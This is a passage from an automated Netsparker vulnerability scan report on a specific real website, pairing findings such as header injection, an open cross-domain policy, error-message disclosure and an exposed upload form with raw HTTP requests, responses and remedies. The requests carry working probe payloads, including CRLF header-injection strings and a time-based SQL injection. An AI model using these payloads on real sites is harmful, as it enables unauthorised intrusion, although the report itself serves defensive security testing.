Expires: Tue, 01 Jan 1971 02:00:00 GMT
6.3. /site/bmidrash/mekorot.asp
http://www.shalomlaam.co.il/site/bmidrash/mekorot.asp?id=%0d%0ans%3anetsparker056650%3dvuln
Parameters
Parameter Type Value
id GET ns:netsparker056650=vuln
Certainty
Request
GET /site/bmidrash/mekorot.asp?id=%0d%0ans%3anetsparker056650%3dvuln HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 May 2014 13:59:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shalomlaam.co.il/bmidrash/mekorot.asp?id=
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
6.4. /site/bmidrash/answer.asp
http://www.shalomlaam.co.il/site/bmidrash/answer.asp?id=%0d%0ans%3anetsparker056650%3dvuln&alon=460
Parameters
Parameter Type Value
id GET ns:netsparker056650=vuln
alon GET 460
97 / 146
Certainty
Request
GET /site/bmidrash/answer.asp?id=%0d%0ans%3anetsparker056650%3dvuln&alon=460 HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 May 2014 13:59:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shalomlaam.co.il/bmidrash/answer.asp?id=
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
6.5. /site/alon/list.asp
http://www.shalomlaam.co.il/site/alon/list.asp?CatID=%0d%0ans%3anetsparker056650%3dvuln
Parameters
Parameter Type Value
CatID GET ns:netsparker056650=vuln
Certainty
Request
GET /site/alon/list.asp?CatID=%0d%0ans%3anetsparker056650%3dvuln HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 May 2014 13:58:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shalomlaam.co.il/alon/list.asp?id=0&CatID=
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
6.6. /site/ask/
http://www.shalomlaam.co.il/site/ask/?CatID=%0d%0ans%3anetsparker056650%3dvuln&page=2
Parameters
Parameter Type Value
CatID GET ns:netsparker056650=vuln
page GET 2
Certainty
Request
GET /site/ask/?CatID=%0d%0ans%3anetsparker056650%3dvuln&page=2 HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
98 / 146
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 May 2014 13:57:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shalomlaam.co.il/ask/Default.asp?id=0&CatID=
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
99 / 146
1 TOTAL
MEDIUM
CONFIRMED
1
7. Open Policy Crossdomain.xml Identified
Netsparker identified Open Policy Crossdomain.xml file.
{PRODUCT} detected an open policy Crossdomain.xml file.
Impact
Open policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be
used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.
Remedy
Configure your Crossdomain.xml to prevent access from everywhere to your domain.
External References
Cross-domain policy file usage recommendations for Flash Player
Crossdomain.xml invites Cross-site Mayhem
Classification
OWASP A6 PCI v2.0-6.5.9 CWE-16 WASC-15
7.1. /crossdomain.xml CONFIRMED
http://www.shalomlaam.co.il/crossdomain.xml
Policy Rules
<allow-access-from domain="*" />
Request
GET /crossdomain.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Content-Length: 106
Content-Type: text/xml
Last-Modified: Wed, 09 Nov 2011 15:09:04 GMT
Accept-Ranges: bytes
ETag: "86b64885f19ecc1:1290d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 20 May 2014 13:43:40 GMT
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
100 / 146
1 TOTAL
LOW
CONFIRMED
1
8. Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior
should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate
vulnerability.
{PRODUCT} identified an internal server error.
The server responded with an HTTP status 500, indicating there is a server-side error. Reasons may vary, and the behavior should be
analyzed carefully. If {PRODUCT} is able to find a security issue in the same resource, it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting.
However, there might be a bigger issue, such as SQL injection. If that's the case, {PRODUCT} will check for other possible issues and report them separately.
Remedy
Analyze this issue and review the application code in order to handle unexpected errors; this should be a generic practice, which does not disclose further
information upon an error. All errors should be handled server-side only.
8.1. /images/ CONFIRMED
http://www.shalomlaam.co.il/images/
Request
GET /images/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 13:43:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 350
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font><p><font face="Arial" size=2>Include file not found</font><p><font face="Arial"
size=2>/images/Default.asp</font><font face="Arial" size=2>, line 1</font><p><font face="Arial" size=2>The include file 'pagetop.asp' was not found.</font>
101 / 146
1 TOTAL
LOW
CONFIRMED
1
9. Auto Complete Enabled
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as
"Credit Card".
{PRODUCT} detected that auto complete is enabled in one or more of the form fields.
These were either "password" fields or important fields, such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially
important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.
Actions to Take
1. Add the attribute autocomplete="off" to the form tag or to individual "input" fields.
2. Find all instances of inputs that store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should
not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
3. Re-scan the application after addressing the identified issues to ensure all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy, and a number of automated tools exist to undertake this. Where the attacker cannot dump the data,
he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
Using AutoComplete in HTML Forms
Classification
CWE-16 WASC-15
9.1. /reg/login.asp CONFIRMED
http://www.shalomlaam.co.il/reg/login.asp?id=0
Identified Field Name
password
Request
GET /reg/login.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/reg/login.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:37 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 33739
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=windows-1255">
<link rel="shortcut icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<meta property="app_id" content="d87442e00d37a7959d0d216f101e0ea0">
<meta property="admins" content="1162579212">
<title> - </title>
<meta name="Author" CONTENT="shalomlaam.co.il">
<meta name="Keywords"
content=',,,,,,,,,,,,,,,,,,,,,,,,,,'>
<meta name="Description" CONTENT=", , , ' '. . ' '
: , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Scripts/swfobject_modified.js" type="text/javascript"></script>-->
<script language="javascript" src="/js/HebDate.js"></script>
<script type="text/javascript">
<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i]

102 / 146
1 TOTAL
LOW
10. Database Error Message
Netsparker identified a database error message. {PRODUCT} identified a database error message disclosure.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface.
In rare conditions this may be a clue for an SQL injection vulnerability. Most of the time {PRODUCT} will detect and report that problem separately.
Remedy
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or
database, then show this number and a static user-friendly error message to the user.
Classification
OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
10.1. /reg/maillingUpdate.asp
http://www.shalomlaam.co.il/reg/maillingUpdate.asp
Parameters
Parameter Type Value
emailtonews POST 1));DECLARE/**/@x/**/char(9);SET/**/@x=char
(48)+char(58)+char(48)+char(58)+char(50)+cha
r(53);WAITFOR/**/DELAY/**/@x--
Certainty
Request
POST /reg/maillingUpdate.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 173
Accept-Encoding: gzip, deflate
emailtonews=1))%3bDECLARE%2f**%2f%40x%2f**%2fchar(9)%3bSET%2f**%2f%40x%3dchar(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53)%3bWAITFOR%2f**%2fDELAY%2f**%2f%40x--
Response

<table width="800" border="0" cellspacing="0" cellpadding="0">


<tr dir="rtl">
<td valign="top">
<p class="text_ratz_bold">&nbsp;</p>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/reg/maillingUpdate.asp</font><font face="Arial" size=2>, line 20</

103 / 146
1 TOTAL
LOW
11. Programming Error Message
Netsparker identified a programming error message. {PRODUCT} identified a programming error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface.
Source code, stack trace, etc. data may be disclosed. Most of these issues will be identified and reported separately by {PRODUCT}.
Remedy
Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or
database, then show this number and a static user-friendly error message to the user.
Classification
OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
11.1. /ask/answer.asp
http://www.shalomlaam.co.il/ask/answer.asp?id=%2527
Parameters
Parameter Type Value
id GET %27
Identified Error Message
Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
Certainty
Request
GET /ask/answer.asp?id=%2527 HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

<td height="20">&nbsp;</td>
</tr>
<head>
<style type="text/css">
.style1
{
height: 67px;
}
</style>
</head>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: '[string:
&quot;%27&quot;]'</font><p><font face="Arial" size=2>/ask/answer.asp</font><font face="Arial" size=2>, line 12</font>
104 / 146
1 TOTAL
INFORMATION
CONFIRMED
1
12. Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information
purposes.
{PRODUCT} identified a forbidden resource.
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for
informational purposes.
Impact
This issue is reported as additional information only. There is no direct impact arising from this issue.
12.1. /js/ CONFIRMED
http://www.shalomlaam.co.il/js/
Request
GET /js/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 20 May 2014 13:43:38 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be
listed.</body></body></html>
105 / 146
1 TOTAL
INFORMATION
CONFIRMED
1
13. File Upload Functionality Identified
This page allows users to upload files to the web server. Upload forms are generally dangerous unless they are coded with a great
deal of care. This issue is reported for information only. If there is any other vulnerability identified regarding this resource
Netsparker will report it as a separate issue.
{PRODUCT} detected file upload functionality, which allows users to upload files to the web server.
Upload forms are generally dangerous, unless they are coded with a great deal of care. If there is any other vulnerability identified
regarding this resource, {PRODUCT} will report it as a separate issue.
Impact
This issue is reported as additional information only. There is no direct impact arising from this issue.
13.1. /gallery/upload_img.asp CONFIRMED
http://www.shalomlaam.co.il/gallery/upload_img.asp
Form Name
picture
Request
GET /gallery/upload_img.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/gallery/snifim.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:54:01 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 15368
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=windows-1255">
<link rel="shortcut icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<meta property="app_id" content="d87442e00d37a7959d0d216f101e0ea0">
<meta property="admins" content="1162579212">
<title> - </title>
<meta name="Author" CONTENT="shalomlaam.co.il">
<meta name="Keywords"
content=',,,,,,,,,,,,,,,,,,,,,,,,,,'>
<meta name="Description" CONTENT=" ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Scripts/swfobject_modified.js" type="text/javascript"></script>-->
<script language="javascript" src="/js/HebDate.js"></script>
<script type="text/javascript">
<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j

106 / 146
1 TOTAL
INFORMATION
CONFIRMED
1
14. Microsoft SQL Server Identified
Netsparker identified that the target web site is using Microsoft SQL Server as its backend database. This issue is reported for
information purposes only.
{PRODUCT} detected the target website is using Microsoft SQL Server as its backend database.
This is generally not a security issue and is reported here for informational purposes only.
Impact
This issue is reported as additional information only. There is no direct impact arising from this issue.
14.1. /contact/ CONFIRMED
http://www.shalomlaam.co.il/contact/
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 258
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,
(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:05:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13813
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=windows-1255">
<link rel="shortcut icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="http://www.shalomlaam.co.il/favicon.ico" type="image/vnd.microsoft.icon">
<meta property="app_id" content="d87442e00d37a7959d0d216f101e0ea0">
<meta property="admins" content="1162579212">
<title> - </title>
<meta name="Author" CONTENT="shalomlaam.co.il">
<meta name="Keywords"
content=',,,,,,,,,,,,,,,,,,,,,,,,,,'>
<meta name="Description" CONTENT=", , , ' '. . ' '
: , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Scripts/swfobject_modified.js" type="text/javascript"></script>-->
<script language="javascript" src="/js/HebDate.js"></script>
<script type="text/javascript">
<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&

107 / 146
1 TOTAL
INFORMATION
15. E-mail Address Disclosure
Netsparker found e-mail addresses on the web site. {PRODUCT} identified an e-mail address disclosure.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute-force tools. Furthermore, valid email addresses
may lead to social engineering attacks.
Remedy
Use generic email addresses such as contact@ or info@ for general communications and remove user/people-specific e-mail addresses from the website;
should this be required, use submission forms for this purpose.
External References
Wikipedia - E-Mail Spam
Classification
OWASP A6 PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
15.1. /contact/
http://www.shalomlaam.co.il/contact/
Found E-mails
webmaster@shalomlaam.co.il
Certainty
Request
GET /contact/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

' 18 ,</P>
<P class=text_2> - 10:00 - 17:00.</P>
<P class=text_2>': 02-5022881</P>
<P class=text_2>: 02-5022771 ": <A href="mailto:webmaster@shalomlaam.co.il">webmaster@shalomlaam.co.il</A></P></TD>
<TD><A href="http://www.shalomlaam.co.il/site/"><IMG alt= src="http://www.shalomlaam.co.il/site/pic/logo.jpg" width=130 height=130></A></TD></TR></TBODY></TABLE></div></td>

108 / 146
1 TOTAL
INFORMATION
16. IIS Version Disclosure
Netsparker identified that the target web server is disclosing the IIS version in its HTTP response. This information might help an
attacker gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server
version.
{PRODUCT} identified a version disclosure (IIS) in target web server's HTTP response.
This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific
version of IIS.
Impact
An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
Remedy
Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
Remedy References
URLScan RemoveServerHeader Directive
16.1. /site/gallery/
http://www.shalomlaam.co.il/site/gallery/
Extracted Version
Microsoft-IIS/6.0
Certainty
Request
GET /site/gallery/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 May 2014 13:43:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shalomlaam.co.il/gallery/Default.asp?id=0
Content-Length: 0
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
109 / 146
1 TOTAL
INFORMATION
17. Sitemap Identified
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.
{PRODUCT} detected a sitemap file on the target website.
Impact
This issue is reported as additional information only. There is no direct impact arising from this issue.
17.1. /sitemap.xml
http://www.shalomlaam.co.il/sitemap.xml
Certainty
Request
GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

T
Accept-Ranges: bytes
ETag: "5c8fe2b853adcb1:1290d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 20 May 2014 13:43:39 GMT
<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">

110 / 146
74 TOTAL
INFORMATION
18. [Possible] Internal Path Leakage (*nix)
Netsparker identified an internal path in the document. {PRODUCT} identified a possible internal path disclosure (*nix) in the
document.
Impact
There is no direct impact; however, this information can help an attacker identify other vulnerabilities or help during the exploitation of other identified
vulnerabilities.
Remedy
First, ensure this is not a false positive. Due to the nature of the issue, {PRODUCT} could not confirm that this file path was actually the real file path of the
target web server.
Error messages should be disabled.
Remove this kind of sensitive data from the output.
External References
OWASP - Full Path Disclosure
Classification
PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
18.1. /pages/page.asp
http://www.shalomlaam.co.il/pages/page.asp?id=96
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /pages/page.asp?id=96 HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
